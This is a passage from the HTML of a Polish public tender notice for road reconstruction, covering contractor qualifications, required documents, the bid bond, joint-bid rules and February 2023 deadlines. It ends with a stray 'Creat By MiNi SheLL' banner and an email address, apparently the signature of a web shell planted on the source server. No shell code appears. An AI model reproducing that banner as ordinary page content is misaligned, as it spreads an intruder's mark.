class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia publicznego może ubiegać się wykonawca, który spełnia warunki, dotyczące zdolności technicznej lub zawodowej tj.<br/>1)	posiada doświadczenie zawodowe rozumiane jako należyte wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie):co najmniej dwa zadania polegające na wykonaniu przebudowy dróg o nawierzchni bitumicznej o wartości min. 150 000,00 zł brutto każda.<br/>2)	dysponuje lub będzie dysponował osobami posiadającymi uprawnienia budowlane do sprawowania samodzielnych funkcji technicznych w budownictwie tj. osobą zdolną do przyjęcia obowiązków kierownika robót, która posiada uprawnienia do kierowania robotami budowlanymi bez ograniczeń w branży drogowej <br/>lub inne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawa wraz z aktualnym zaświadczeniem o przynależności do Okręgowej Izby In-żynierów Budownictwa i decyzję o wpisie do centralnego rejestru, o którym mowa w art. 88a ust. 1 pkt 3. lit a) ustawy z dnia 7 lipca 1994 roku - Prawo Budowla-ne.<br/>Jednocześnie zamawiający zaznacza, iż zgodnie z art. 12a - ustawy z dnia 7 lipca 1994 roku - Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach od-rębnych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Nie dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz robót budowanych<br/>Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – <br/>w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty.<br/>Wzór wykazu robót budowlanych stanowi Załącznik Nr 3 do SWZ.<br/>Wykaz osób<br/>Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, do kierowania robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacji o podstawie do dysponowania tymi osobami<br/>Wzór wykazu osób stanowi Załącznik Nr 4 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 15.	Treść oferty stanowi wypełniony Formularz ofertowy. <br/>16.	Wraz z ofertą muszą zostać złożone:<br/>1.1.	Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania Załącznik Nr 2 do SWZ (w przypadku wspólnego ubiegania się o udzielenie zamówienia przez Wykonawców, oświadczenie składa każdy z Wykonawców). <br/>1.2.	Zobowiązanie podmiotu trzeciego <br/>1.3.	Pełnomocnictwo upoważniające do złożenia oferty – jeżeli dotyczy <br/>1.4.	Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Każda oferta musi być zabezpieczona wadium o wartości :<br/>10 000,00 zł (słownie: dziesięć tysięcy złotych, 0/100). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2.	W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich<br/>w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, wypełniony druk oświadczenia, wg Załącznika Nr 2 do SWZ składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału<br/>w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje oraz brak podstaw wykluczenia. <br/>4.	Zgodnie z art. 117 ust. 4 ustawy Pzp, w przypadkach, o których mowa a art. 117 ust. 2 i 3 ustawy Pzp, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają oświad-czenie z którego wynika, które usługi wykonują poszczególni wykonawcy. <br/>5.	Wspólnicy ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia, określoną w art. 366 Kodeksu Cywilnego.<br/>6.	Wszelka korespondencja będzie prowadzona wyłącznie z pełnomocnikiem.<br/>7.	Przed podpisaniem umowy od Wykonawców ubiegających się wspólnie o zamówienie publiczne, których oferta została wybrana Zamawiający będzie żądać umowy regulującej ich współpracę. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> określone we wzorze umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-02-13 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-02-13 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-03-14</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">5</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> cena oferty

Creat By MiNi SheLL
Email: jattceo@gmail.com